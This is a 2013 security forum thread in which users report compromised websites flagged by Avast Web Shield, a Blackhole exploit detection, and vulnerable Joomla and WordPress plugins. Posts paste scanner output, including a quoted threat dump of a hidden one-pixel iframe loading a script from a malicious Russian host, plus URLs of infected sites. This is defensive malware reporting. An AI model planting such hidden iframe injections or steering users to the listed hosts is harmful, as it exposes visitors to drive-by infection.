Topic: Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan... (Read 2118 times)
polonus
Avast Überevangelist
Probably Bot
Posts: 33926
malware fighter
Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan...
« on: May 16, 2013, 09:26:04 PM »
Folks, we really cannot do without avast! Web Shield for our protection. Checked this...Up(nil): unknown_html ARIN US abuse at softlayer dot com 50.22.194.94 to 50.22.194.94 berkonoutdoors dot com htxp://berkonoutdoors.com/catalog/
So wanted to look this domain up with evuln malware scanner and avast! Web Shield flagged JS:Decode-XA[Trj]
Detected malicious iframe injection ->
http://urlquery.net/report.php?id=2496495
so even getting enough of the malcode in a scan will block access to that scan.
We have a high level of protection, my friends, we sure have...
Also detected here:
http://scanurl.net/?u=http%3A%2F%2Fberkonoutdoors.com%2Fcatalog%2Faccount.php&uesb=Check+This+URL#results
polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
Pondus
Probably Bot
Posts: 37582
Not a avast user
Re: Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan...
« Reply #1 on: May 16, 2013, 10:34:24 PM »
Blackhole exploit
https://www.virustotal.com/nb/file/8d71de0fb803f921a60a74f080e1c44e224d6ea87c6c02bafb724e2be7e61b16/analysis/1368736403/
polonus
Avast Überevangelist
Probably Bot
Posts: 33926
malware fighter
Re: Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan...
« Reply #2 on: May 16, 2013, 10:48:39 PM »
Hi Pondus,
Well done, my friend, and thanks, you found the accompanying file analysis; conclusion: we are being protected,
polonus
polonus
Avast Überevangelist
Probably Bot
Posts: 33926
malware fighter
Re: Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan...
« Reply #3 on: May 17, 2013, 04:51:30 PM »
Another example here:
https://www.virustotal.com/en/url/9eb8238066cc10b7b820161ab9490946756498c1b81a983242bfb4a1f04db015/analysis/1368801212/
Trying to see the evuln dot com scan results resulted in the avast! Webshield alerting HTML:Iframe-AKU[Trj] and blocking the | (gzip) file there....
Potentially suspicious code in: /plugins/system/rokbox/rokbox-mt1.2.js
Severity: Potentially Suspicious
Reason: Detected potentially suspicious content.
Details: Detected potentially suspicious initialization of function pointer to JavaScript method write <code> __tmpvar2040143295 = write; <code/>
File size[byte]: 21665
File type: ASCII
MD5: FF5022D82F8C393211349AE8951ACB8E
Scan duration[sec]: 0.086000
given at Quttera's.....
Site has vulnerable Joomla code: Joomla Version 1.5.18 to 1.5.26 for: htxp://thejourneypc.com/language/en-GB/en-GB.ini via plug-in...
Site blacklisted by Google's Safebrowsing
polonus
polonus
Avast Überevangelist
Probably Bot
Posts: 33926
malware fighter
Re: Web Shield does not flag this redirect to a High Risk Hosting Provider..
« Reply #4 on: May 17, 2013, 05:09:22 PM »
Same here:
http://sitecheck.sucuri.net/results/slownik-angielsko-polski.pl/
WP plug-in vulnerabilities....
https://www.virustotal.com/en/url/f9cc0d2d903232134eb5533c2c6b0cfba98c4d3ffbebcb43116774b73b46114a/analysis/1368802643/
we would think but avast does not flag going to site...
index.html
Severity: Suspicious
Reason: Detected hidden reference to external web resource.
Details: Detected hidden iframe tag to 'temp.vulkancomplect.ru' a bad webhost with on IP 283 appearance(s) in spam e-mail or spam post urls
Threat dump: [[<iframe src="htxp://temp.vulkancomplect.ru/srqoxie.php" width=1 height=1 style="visibility: hidden">]]
File size[byte]: 1744
File type: ASCII
MD5: 1D3446BD473753C8A1842DDC1F1C189B
Scan duration[sec]: 0.002000
i.m.h.o. should be blocked,
polonus